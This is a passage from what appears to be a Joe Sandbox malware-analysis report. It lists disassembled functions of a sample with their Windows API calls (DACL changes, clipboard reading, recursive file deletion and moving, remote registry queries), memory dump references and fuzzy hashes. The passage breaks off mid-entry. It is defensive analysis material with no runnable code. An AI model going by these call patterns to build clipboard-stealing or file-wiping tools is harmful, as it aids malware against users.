                                                                                                                                                                                                                                                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00F61600
                                                                                                                                                                                                                                                                                        • CopySid.ADVAPI32(00000000), ref: 00F61607
                                                                                                                                                                                                                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00F61636
                                                                                                                                                                                                                                                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00F61658
                                                                                                                                                                                                                                                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00F6166A
                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00F61691
                                                                                                                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 00F61698
                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00F616A1
                                                                                                                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 00F616A8
                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00F616B1
                                                                                                                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 00F616B8
                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00F616C4
                                                                                                                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 00F616CB
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F61ADF: GetProcessHeap.KERNEL32(00000008,00F614FD,?,00000000,?,00F614FD,?), ref: 00F61AED
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F61ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,00F614FD,?), ref: 00F61AF4
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F61ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00F614FD,?), ref: 00F61B03
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 4175595110-0
                                                                                                                                                                                                                                                                                        • Opcode ID: ab8e00cf45d4026775e92bc45b46e1a2acd912f93ddf07742c7c3bccf1e34643
                                                                                                                                                                                                                                                                                        • Instruction ID: c74c961fc5967ec0e1b6a1d088e929f9d9dd0c59d53c19e45cf37478a09996c8
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ab8e00cf45d4026775e92bc45b46e1a2acd912f93ddf07742c7c3bccf1e34643
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3A715BB6D00209ABDF10DFA5DC48FEEBBB8BF04350F184516E915E71A1D7359A05DBA0
                                                                                                                                                                                                                                                                                        Function 00F7F55C Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • OpenClipboard.USER32(00F9DCD0), ref: 00F7F586
                                                                                                                                                                                                                                                                                        • IsClipboardFormatAvailable.USER32(0000000D), ref: 00F7F594
                                                                                                                                                                                                                                                                                        • GetClipboardData.USER32(0000000D), ref: 00F7F5A0
                                                                                                                                                                                                                                                                                        • CloseClipboard.USER32 ref: 00F7F5AC
                                                                                                                                                                                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00F7F5E4
                                                                                                                                                                                                                                                                                        • CloseClipboard.USER32 ref: 00F7F5EE
                                                                                                                                                                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00F7F619
                                                                                                                                                                                                                                                                                        • IsClipboardFormatAvailable.USER32(00000001), ref: 00F7F626
                                                                                                                                                                                                                                                                                        • GetClipboardData.USER32(00000001), ref: 00F7F62E
                                                                                                                                                                                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00F7F63F
                                                                                                                                                                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00F7F67F
                                                                                                                                                                                                                                                                                        • IsClipboardFormatAvailable.USER32(0000000F), ref: 00F7F695
                                                                                                                                                                                                                                                                                        • GetClipboardData.USER32(0000000F), ref: 00F7F6A1
                                                                                                                                                                                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00F7F6B2
                                                                                                                                                                                                                                                                                        • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00F7F6D4
                                                                                                                                                                                                                                                                                        • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00F7F6F1
                                                                                                                                                                                                                                                                                        • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00F7F72F
                                                                                                                                                                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00F7F750
                                                                                                                                                                                                                                                                                        • CountClipboardFormats.USER32 ref: 00F7F771
                                                                                                                                                                                                                                                                                        • CloseClipboard.USER32 ref: 00F7F7B6
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 420908878-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 298d7fa343f1b10ed262205ebfc247e956fce654ac1d8fbcc94e91817bfa927a
                                                                                                                                                                                                                                                                                        • Instruction ID: 30af10e00c50c5d3b013d4d817ad9e357febb040a05d85425db9e18215dd83e2
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 298d7fa343f1b10ed262205ebfc247e956fce654ac1d8fbcc94e91817bfa927a
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9561C3352043059FD304EF24DC84F6ABBA4AF84714F24856EF44A872A2DB31ED49FB62
                                                                                                                                                                                                                                                                                        Function 00F773D4 Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00F77403
                                                                                                                                                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00F77457
                                                                                                                                                                                                                                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00F77493
                                                                                                                                                                                                                                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00F774BA
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F0B329: _wcslen.LIBCMT ref: 00F0B333
                                                                                                                                                                                                                                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 00F774F7
                                                                                                                                                                                                                                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 00F77524
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                                                                                                                                                                                                                                        • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                                                                                                                                                                                                                                        • API String ID: 3830820486-3289030164
                                                                                                                                                                                                                                                                                        • Opcode ID: f7b1269caaa422aae869d966ba39c2dca3c4d97f4ce0ce5295dfc11cbbee9c4f
                                                                                                                                                                                                                                                                                        • Instruction ID: c6df5093eebbd7d279e69007b5de507a035bc6ae91ef2610310f4813dc8070ca
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f7b1269caaa422aae869d966ba39c2dca3c4d97f4ce0ce5295dfc11cbbee9c4f
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 12D17272508344AFC310EB64CC41EAFB7ECAF88704F44491EF589D6191EB78DA49EB62
                                                                                                                                                                                                                                                                                        Function 00F7A087 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 00F7A0A8
                                                                                                                                                                                                                                                                                        • GetFileAttributesW.KERNEL32(?), ref: 00F7A0E6
                                                                                                                                                                                                                                                                                        • SetFileAttributesW.KERNEL32(?,?), ref: 00F7A100
                                                                                                                                                                                                                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00F7A118
                                                                                                                                                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00F7A123
                                                                                                                                                                                                                                                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 00F7A13F
                                                                                                                                                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00F7A18F
                                                                                                                                                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(00FC7B94), ref: 00F7A1AD
                                                                                                                                                                                                                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00F7A1B7
                                                                                                                                                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00F7A1C4
                                                                                                                                                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00F7A1D4
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                                                                                                                                                                                        • String ID: *.*
                                                                                                                                                                                                                                                                                        • API String ID: 1409584000-438819550
                                                                                                                                                                                                                                                                                        • Opcode ID: 4c6f1266588a7771c79055376a7aec81335643f5cd76f6d39a16a289209ee43d
                                                                                                                                                                                                                                                                                        • Instruction ID: d80560956b3d17ca700a1b56b732a61bce6b4e90613249df06c9051d0a9d2340
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4c6f1266588a7771c79055376a7aec81335643f5cd76f6d39a16a289209ee43d
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B731EA3290021D6BEB10AFB4DC4AEDE73AC9F84320F654157E819D3090E774DE44AE66
                                                                                                                                                                                                                                                                                        Function 00F74763 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101fileCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00F74785
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F747B2
                                                                                                                                                                                                                                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 00F747E2
                                                                                                                                                                                                                                                                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00F74803
                                                                                                                                                                                                                                                                                        • RemoveDirectoryW.KERNEL32(?), ref: 00F74813
                                                                                                                                                                                                                                                                                        • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00F7489A
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00F748A5
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00F748B0
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                                                                                                                                                                                                                                                        • String ID: :$\$\??\%s
                                                                                                                                                                                                                                                                                        • API String ID: 1149970189-3457252023
                                                                                                                                                                                                                                                                                        • Opcode ID: 12e655aaa612de852fbc869d670219cae69e05d08cb1ae104ff5f0ac880ff0d9
                                                                                                                                                                                                                                                                                        • Instruction ID: 489bb090805e9500c1850fe1831b3ce9b1f7b4261c0d3ac819f9bb467e34862a
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 12e655aaa612de852fbc869d670219cae69e05d08cb1ae104ff5f0ac880ff0d9
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5731A37290025DABDB209BA0DC49FEB37BDEF89710F6081B6F509D2060E7749645EB25
                                                                                                                                                                                                                                                                                        Function 00F7A1E2 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 00F7A203
                                                                                                                                                                                                                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00F7A25E
                                                                                                                                                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00F7A269
                                                                                                                                                                                                                                                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 00F7A285
                                                                                                                                                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00F7A2D5
                                                                                                                                                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(00FC7B94), ref: 00F7A2F3
                                                                                                                                                                                                                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00F7A2FD
                                                                                                                                                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00F7A30A
                                                                                                                                                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00F7A31A
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F6E399: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00F6E3B4
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                                                                                                                                                                                                                        • String ID: *.*
                                                                                                                                                                                                                                                                                        • API String ID: 2640511053-438819550
                                                                                                                                                                                                                                                                                        • Opcode ID: 8a5106fdf73e606889c1bde39dc854f8c1c09c5c5b5a905f5f95f9528f4d22db
                                                                                                                                                                                                                                                                                        • Instruction ID: e1299891c5683772b4a2f8ff99b0e1866dc0ae84df3679bca9e59f7150a932d0
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8a5106fdf73e606889c1bde39dc854f8c1c09c5c5b5a905f5f95f9528f4d22db
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1E31053290061D6ADB10AFB4EC09EDE77AC9F85334F258196E818A3091DB35DE45EE16
                                                                                                                                                                                                                                                                                        Function 00F8C8A4 Relevance: 17.0, APIs: 11, Instructions: 456registryCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F8D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F8C10E,?,?), ref: 00F8D415
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F8D3F8: _wcslen.LIBCMT ref: 00F8D451
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F8D3F8: _wcslen.LIBCMT ref: 00F8D4C8
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F8D3F8: _wcslen.LIBCMT ref: 00F8D4FE
                                                                                                                                                                                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F8C99E
                                                                                                                                                                                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 00F8CA09
                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00F8CA2D
                                                                                                                                                                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00F8CA8C
                                                                                                                                                                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00F8CB47
                                                                                                                                                                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00F8CBB4
                                                                                                                                                                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00F8CC49
                                                                                                                                                                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 00F8CC9A
                                                                                                                                                                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00F8CD43
                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00F8CDE2
                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00F8CDEF
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3102970594-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 465d815fff2cf732fe0f662b4fadbe58a985126bd99118829b3583af6bfe8da1
                                                                                                                                                                                                                                                                                        • Instruction ID: e5d683ae7c3b20eb7731a41d765a30c42f69add4a36392c9dc25a9e04388ddc1
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 465d815fff2cf732fe0f662b4fadbe58a985126bd99118829b3583af6bfe8da1
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 14026371A042009FD714EF24C895E6ABBE5EF49314F18849DF849CB2A2C735ED46EBA1
                                                                                                                                                                                                                                                                                        Function 00F6D921 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F05851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F055D1,?,?,00F44B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00F05871
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F6EAB0: GetFileAttributesW.KERNEL32(?,00F6D840), ref: 00F6EAB1
                                                                                                                                                                                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00F6D9CD
                                                                                                                                                                                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00F6DA88
                                                                                                                                                                                                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 00F6DA9B
                                                                                                                                                                                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,?), ref: 00F6DAB8
                                                                                                                                                                                                                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00F6DAE2
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F6DB47: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00F6DAC7,?,?), ref: 00F6DB5D
                                                                                                                                                                                                                                                                                        • FindClose.KERNEL32(00000000,?,?,?), ref: 00F6DAFE
                                                                                                                                                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00F6DB0F
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                                                                                                                                                                                                                                        • String ID: \*.*
                                                                                                                                                                                                                                                                                        • API String ID: 1946585618-1173974218
                                                                                                                                                                                                                                                                                        • Opcode ID: a70ac137199ffe4edd0dbcb779be99cc12647a591fb05344ab065297972a7672
                                                                                                                                                                                                                                                                                        • Instruction ID: a74f8071a211ca5279102b5a37a54a822b22b9b3c5c123cb87f500b893f18dc9
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a70ac137199ffe4edd0dbcb779be99cc12647a591fb05344ab065297972a7672
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 62613931D0510DAACF15EBE0CE92AEDB7B5AF55300F2041A5E802B7196EB795F09FB60
                                                                                                                                                                                                                                                                                        Function 00F7F7C7 Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
